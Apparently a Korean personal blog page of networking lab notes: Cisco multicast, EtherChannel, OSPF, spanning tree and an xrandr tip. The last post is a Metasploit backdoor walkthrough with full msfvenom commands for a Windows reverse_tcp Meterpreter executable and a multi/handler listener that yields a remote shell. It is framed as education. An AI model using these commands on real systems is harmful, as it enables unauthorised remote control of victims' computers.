분류 전체보기: 185개의 글

Multi Cast. dense-mode

Posted by nkjok
2017. 12. 6. 09:09 네트워크-Router, Switch, Security/라우터-Router
반응형


멀티캐스트 + VLC media player를 통한 실시간 영상전달.



셋팅

All Layer 3 (config)#ip multicast-routing

All Layer 3 (config-if)#ip pim dense-mode



HQ_SE_1F_L3_1#show ip mroute

IP Multicast Routing Table

(*, 239.1.1.1), 00:42:55/stopped, RP 0.0.0.0, flags: D

  Incoming interface: Null, RPF nbr 0.0.0.0

  Outgoing interface list:

    FastEthernet0/0, Forward/Dense, 00:42:55/00:00:00

(192.168.1.1, 239.1.1.1), 00:36:55/00:02:54, flags: T

  Incoming interface: FastEthernet0/1, RPF nbr 0.0.0.0

  Outgoing interface list:

    FastEthernet0/0, Forward/Dense, 00:36:41/00:00:00

(*, 239.255.255.250), 01:03:07/00:02:46, RP 0.0.0.0, flags: DC

  Incoming interface: Null, RPF nbr 0.0.0.0

  Outgoing interface list:

    FastEthernet0/1, Forward/Dense, 01:03:07/00:00:00

    FastEthernet0/0, Forward/Dense, 01:03:07/00:00:00

(*, 224.0.1.40), 01:08:19/00:02:56, RP 0.0.0.0, flags: DCL

  Incoming interface: Null, RPF nbr 0.0.0.0

  Outgoing interface list:

    FastEthernet0/0, Forward/Dense, 01:08:19/00:00:00


반응형

'네트워크-Router, Switch, Security > 라우터-Router' 카테고리의 다른 글

Hot Standby Routing Protocol  (0) 2017.12.13
NAT Static  (0) 2017.12.08
OSPF Key Chain  (0) 2017.12.04
Totally Stub  (0) 2017.12.02
OSPF Summary  (0) 2017.11.30

Layer3 Etherchannel

Posted by nkjok
2017. 12. 5. 10:03 네트워크-Router, Switch, Security/스위치-Switch
반응형

서버실에서 외부로 나가는 PathDown되었을 경우나 트래픽이 많을 때를 대비해 대역폭을 확보.



셋팅

interface FastEthernet0/3

 no switchport

 no ip address

 channel-group 1 mode active

!

interface FastEthernet0/4

 no switchport

 no ip address

 channel-group 1 mode active

!

!

interface Port-channel1

 no switchport

 ip address 192.168.33.1 255.255.255.0

!




HQ_SE_2F_L3_1#show etherchannel summary

Flags:  D - down        P - in port-channel

        I - stand-alone s - suspended

        H - Hot-standby (LACP only)

        R - Layer3      S - Layer2

        U - in use      f - failed to allocate aggregator

        u - unsuitable for bundling

        w - waiting to be aggregated

        d - default port

Number of channel-groups in use: 1

Number of aggregators:           1

Group  Port-channel  Protocol    Ports

------+-------------+-----------+-----------------------------------------------

1      Po1(RU)         LACP      Fa0/3(P)    Fa0/4(P)




HQ_SE_2F_L3_1#show interfaces port-channel 1

Port-channel1 is up, line protocol is up (connected)

  Hardware is EtherChannel, address is 001a.e27e.88c5

  Internet address is 192.168.33.1/24

  MTU 1500 bytes, BW 200000 Kbit, DLY 100 usec,


반응형

'네트워크-Router, Switch, Security > 스위치-Switch' 카테고리의 다른 글

Backbone Fast  (0) 2017.12.10
Uplink Fast  (0) 2017.12.09
Layer2 Etherchannel  (0) 2017.12.07
Port Fast  (0) 2017.12.03
Spanning Tree 902.1d (PVST)  (0) 2017.12.01

OSPF Key Chain

Posted by nkjok
2017. 12. 4. 12:52 네트워크-Router, Switch, Security/라우터-Router
반응형




 Host 에서 소프트웨어 (GNS3 ) 를 통한 네트워크 해킹 (Neighbor연결시도) 등을 방지하기 위해 사용 .




#Interface

HQ_SE_Core_R1(config-if)#ip ospf authentication message-digest

HQ_SE_Core_R1(config-if)#ip ospf message-digest-key 1 md5 123

HQ_SE_Core_R1(config-if)#ip ospf authentication

HQ_SE_Core_R1(config-if)#ip ospf authentication-key 123

#Area

HQ_SE_1F_L3_1(config-router)#area 1 authentication message-digest

HQ_SE_1F_L3_1(config-router)#area 1 authentication

-KeyInterface에 적용

(같은 방식은 Area Interface 간에 공유 가능)






Hello Debug

05:18:13: OSPF: Send hello to 224.0.0.5 area 0 on Vlan10 from 192.168.1.30

05:18:13: OSPF: Rcv hello from 192.168.1.100 area 0 from Vlan10 192.168.1.100

05:18:13: OSPF: End of hello processing

반응형

'네트워크-Router, Switch, Security > 라우터-Router' 카테고리의 다른 글

Hot Standby Routing Protocol  (0) 2017.12.13
NAT Static  (0) 2017.12.08
Multi Cast. dense-mode  (0) 2017.12.06
Totally Stub  (0) 2017.12.02
OSPF Summary  (0) 2017.11.30

Port Fast

Posted by nkjok
2017. 12. 3. 16:56 네트워크-Router, Switch, Security/스위치-Switch
반응형


PC나 서버 등과 같이 스위칭을 하지 않는

 종단 장비들의 전송모드 전환을 빠르게 하기 위해 적용.





셋팅

HQ_SE_3F_SW3(config)#spanning-tree portfast




적용 전

06:38:42: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/11, changed state to down

06:38:46: setting bridge id (which=3) prio 32769 prio cfg 32768 sysid 1 (on) id 8001.000d.ed5e.6640

06:38:46: set portid: VLAN0001 Fa0/11: new port id 800B

06:38:46: STP: VLAN0001 Fa0/11 -> listening

06:38:47: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/11, changed state to up

06:39:01: STP: VLAN0001 Fa0/11 -> learning

06:39:16: STP: VLAN0001 Fa0/11 -> forwarding





적용 후

06:36:42: %LINK-3-UPDOWN: Interface FastEthernet0/11, changed state to up

06:36:43: setting bridge id (which=3) prio 32769 prio cfg 32768 sysid 1 (on) id  8001.000d.ed5e.6640

06:36:43: set portid: VLAN0001 Fa0/11: new port id 800B

06:36:43: STP: VLAN0001 Fa0/11 ->jump to forwarding from blocking

06:36:44: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/11, changed state to up

반응형

'네트워크-Router, Switch, Security > 스위치-Switch' 카테고리의 다른 글

Backbone Fast  (0) 2017.12.10
Uplink Fast  (0) 2017.12.09
Layer2 Etherchannel  (0) 2017.12.07
Layer3 Etherchannel  (0) 2017.12.05
Spanning Tree 902.1d (PVST)  (0) 2017.12.01

Totally Stub

Posted by nkjok
2017. 12. 2. 14:23 네트워크-Router, Switch, Security/라우터-Router
반응형



E1E2 외부경로와 AS내의 다른 Area경로(O IA) 대신 0.0.0.0/0 을 서비스 한다




셋팅

HQ_SE_Core_R2(config-router)#area 2 stub no-summary

HQ_SE_3F_L3_1 (config-router)#area 2 stub no-summary

HQ_SE_3F_L3_2 (config-router)#area 2 stub no-summary







적용 전

HQ_SE_3F_L3_2

Gateway of last resort is not set

        192.168.1.0/27 is subnetted, 4 subnets

O IA 192.168.1.0 [110/4] via 192.168.5.98, 00:02:33, FastEthernet0/1

O IA 192.168.1.32 [110/4] via 192.168.5.98, 00:02:33, FastEthernet0/1

O IA 192.168.1.64 [110/3] via 192.168.5.98, 00:02:33, FastEthernet0/1

O IA 192.168.1.96 [110/3] via 192.168.5.98, 00:02:33, FastEthernet0/1

        192.168.2.0/27 is subnetted, 1 subnets

O IA     192.168.2.0 [110/3] via 192.168.5.98, 00:02:23, FastEthernet0/1

O IA 192.168.3.0/24 [110/4] via 192.168.5.98, 00:02:33, FastEthernet0/1

O IA 192.168.4.0/24 [110/3] via 192.168.5.98, 00:02:23, FastEthernet0/1

        192.168.5.0/27 is subnetted, 4 subnets

O          192.168.5.0 [110/3] via 192.168.5.98, 00:02:43, FastEthernet0/1

C          192.168.5.32 is directly connected, Vlan20

O          192.168.5.64 [110/2] via 192.168.5.98, 00:02:43, FastEthernet0/1

C          192.168.5.96 is directly connected, FastEthernet0/1

O IA 192.168.32.0/24 [110/3] via 192.168.5.98, 00:02:33, FastEthernet0/1

O IA 192.168.33.0/24 [110/3] via 192.168.5.98, 00:02:33, FastEthernet0/1

O IA 192.168.34.0/24 [110/2] via 192.168.5.98, 00:02:43, FastEthernet0/1

O IA 192.168.35.0/24 [110/2] via 192.168.5.98, 00:02:43, FastEthernet0/1








적용 후

HQ_SE_3F_L3_2

Gateway of last resort is 192.168.5.98 to network 0.0.0.0

   192.168.5.0/27 is subnetted, 4 subnets

O     192.168.5.0 [110/3] via 192.168.5.98, 00:04:38, FastEthernet0/1

C     192.168.5.32 is directly connected, Vlan20

O     192.168.5.64 [110/2] via 192.168.5.98, 00:04:38, FastEthernet0/1

C     192.168.5.96 is directly connected, FastEthernet0/1

O*IA 0.0.0.0/0 [110/2] via 192.168.5.98, 00:04:38, FastEthernet0/1

반응형

'네트워크-Router, Switch, Security > 라우터-Router' 카테고리의 다른 글

Hot Standby Routing Protocol  (0) 2017.12.13
NAT Static  (0) 2017.12.08
Multi Cast. dense-mode  (0) 2017.12.06
OSPF Key Chain  (0) 2017.12.04
OSPF Summary  (0) 2017.11.30

[주분투] 리눅스에서 해상도 추가하기 (XRANDR)

Posted by nkjok
2017. 12. 2. 14:03 OS&기타/Linux
반응형

CVT를 이용해서 원하는 해상도를 입력한다.


root@zkjok-virtual-machine:/# cvt 1280 720

# 1280x720 59.86 Hz (CVT 0.92M9) hsync: 44.77 kHz; pclk: 74.50 MHz

Modeline "1280x720_60.00"   74.50  1280 1344 1472 1664  720 723 728 748 -hsync +vsync





NEW 해주고 ADD 해준다.


xrandr --newmode "1280x720_60.00"   74.50  1280 1344 1472 1664  720 723 728 748 -hsync +vsync

xrandr --addmode Virtual1 "1280x720_60.00"







설정은 끝났지만 재부팅을 하면 설정한 해상도가 사라져 있다.  

설정을 유지시키기 위해서는 .profile 파일에 NEW, ADD 명령어를 추가 해줘야 한다. 







xrandr --newmode "1280x720_60.00"   74.50  1280 1344 1472 1664  720 723 728 748 -hsync +vsync

xrandr --addmode Virtual1 "1280x720_60.00"

반응형

Spanning Tree 902.1d (PVST)

Posted by nkjok
2017. 12. 1. 09:46 네트워크-Router, Switch, Security/스위치-Switch
반응형



 Priority 을 이용해 Root Bridge, Root Port, Altn Port, Desg Port 를 수정 가능하다.




셋팅

HQ_SE_3F_SW1(config)#spanning-tree vlan 10 priority 4096

HQ_SE_3F_SW1(config)#spanning-tree vlan 20 priority 8192 

HQ_SE_3F_SW2(config)#spanning-tree vlan 20 priority 4096

HQ_SE_3F_SW2(config)#spanning-tree vlan 10 priority 8192




HQ_SE_3F_SW3#show spanning-tree vlan 10

VLAN0010

Spanning tree enabled protocol ieee

Root ID Priority 4106

Address 0090.0C5E.97D3

Cost 38

Port 1(FastEthernet0/1)

Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID Priority 32778 (priority 32768 sys-id-ext 10)

Address 000B.BEB0.C1DB

Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Aging Time 20

Interface Role Sts Cost Prio.Nbr Type

---------------- ---- --- --------- -------- --------------------------------

Fa0/1 Root FWD 19 128.1 P2p

Fa0/2 Altn BLK 19 128.2 P2p



HQ_SE_3F_SW4#show spanning-tree vlan 20

VLAN0020

Spanning tree enabled protocol ieee

Root ID Priority 4116

Address 0010.11DA.A531

Cost 38

Port 1(FastEthernet0/1)

Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID Priority 32788 (priority 32768 sys-id-ext 20)

Address 0030.F2D6.6C80

Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Aging Time 20

Interface Role Sts Cost Prio.Nbr Type

---------------- ---- --- --------- -------- --------------------------------

Fa0/1 Root FWD 19 128.1 P2p

Fa0/2 Altn BLK 19 128.2 P2p





반응형

'네트워크-Router, Switch, Security > 스위치-Switch' 카테고리의 다른 글

Backbone Fast  (0) 2017.12.10
Uplink Fast  (0) 2017.12.09
Layer2 Etherchannel  (0) 2017.12.07
Layer3 Etherchannel  (0) 2017.12.05
Port Fast  (0) 2017.12.03

Reverse TCP를 이용한 백도어[backdoor] 실습

Posted by nkjok
2017. 11. 30. 18:21 자격증관련/Metasploit
반응형


요약 인증되지 않은 사용자에 의해 컴퓨터의 기능이 무단으로 사용될 수 있도록 컴퓨터에 몰래 설치된 통신 연결 기능을 말한다.

정상적인 인증 절차를 거치지 않고, 컴퓨터와 암호 시스템 등에 접근할 수 있도록 하는 방법이다. 백도어는 주로 설계 및 개발 단계에 의도적으로 심어지는 것이지만, 작동 중인 컴퓨터에 존재하는 보안 취약점을 통해 전송된 소프트웨어(트로이목마Trojan Horse 등)에 의해 만들어지기도 한다. 넓은 의미로는 기능상의 결함으로 인해 원래 허가되지 않은 통신 및 조작을 입력 받는 보안 구멍(hole)도 포함된다. 프로그램에 부분적으로 숨겨진 형태 혹은 독립적인 소프트웨어 형태, 하드웨어 특징 형태로 숨겨져 있을 수도 있다.

설계 및 개발 단계에 포함되는 백도어의 경우, 네트워크 장비 라우터와 방화벽에 개발 단계에서 테스트를 위해 포함되었던 백도어 형태의 기능이 제품 출시 단계에서 제거되지 않고 출하되어, 이를 발견한 사용자가 악용하는 경우가 있다. 또한 컴퓨터 프로그램 개발자에 의해 프로그램에 백도어가 의도적으로 내장되는 경우가 있으며, 미국에서는 대부분의 통신 기기에 미리 정부 기관으로부터의 접근을 허용하는 백도어가 설치되어 있다. 이를 이용한 도청은 법적 절차를 필요로 하지만, 운영 방법은 불투명하다. 의도하지 않은 개발 단계의 백도어는 주로 운영체제 등의 프로그램이 설계 및 개발 상의 실수로 보안 구멍을 가지는 경우가 있다.

이러한 백도어를 예방하기 위해서는 운영체제 및 소프트웨어 업데이트를 통해 보안 취약점을 제거하는 것이 효과적이다. 안티바이러스 소프트웨어는 트로이 목마와 같은 대부분의 백도어 프로그램을 발견하고 제거 및 비활성화 하는 기능을 가지고 있으며, 스파이웨어 제거 소프트웨어 또한 개인정보를 유출시키는 스파이웨어류의 백도어를 제거하는 데 도움이 된다.

[네이버 지식백과] 백도어 [backdoor] (두산백과)




실습 준비물 : 윈도우7 , 리눅스(데비안계열) , metasploit

 본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.


리눅스에서 metasploit 파일을 구해서 설치한다. 

설치 명령어 : dpkg -i metasploit*






msfvenom -p windows/meterpreter/reverse_tcp lhost=자신IP lport=쓸포트 -f(파일네임 약자) exe > /backup/windows.exe(저장경로)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.12 lport=4444 -f exe > /backup/windows.exe

백도어 파일을 생성해준다음에 msf콘솔을 실행해준다

-l  을 이용해 페이로드 종류를 확인 해볼 수 있다




msfconsole 명령어를 통해 콘솔을 실행한다 






핸들러 정의를 해주고 세션을 확인해보면 현재는 연결된 세션이 없는 것을 확인할 수 있다







이제 테스트 할 윈도우에서 조금 전에 만들어준 백도어 파일을 실행하면 ~







세션이 연결 된 것을 확인 할 수 있다. mkdir Test 라고 입력하면 ~~~







폴더가 생성 된 것을 확인 할 수 있다.







백도어 (Backdoor)


msfvenom설치

metasploit-framework_4.16.16+20171109102928.git.1.c5fd027_1rapid7-1_i386(32bit) 

파일구해서 dpkg -i 로 설치하면됨 (https://apt.metasploit.com/)


msfvenom -l  페일로드 종류확인


msfvenom -p windows/meterpreter/reverse_tcp lhost=자신IP lport=쓸포트 -f(파일네임 약자) exe > /backup/windows.exe(저장경로)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.12 lport=4444 -f exe > /backup/windows.exe




msfconsole  콘솔실행

use exploit/multi/handler  핸들러테이블 불러오는

set payload windows/meterpreter/reverse_tcp  만든 페이로드와 똑같게

set lhost 192.168.0.12     자신의 IP

set lport 4444             사용할 포트

set exitonsession false    세션을 백그라운드 동작 (해커의)

exploit -j                 핸들러 실행

sessions                   세션 View (연결된 세션 보기)

sessions -i 1              세션과 연결시키기 (세션에서 번호확인하고)

이제 help 쳐보면 할수 있는 커맨드들이 나옴 

예) shutdown (윈도우가 꺼진다)








반응형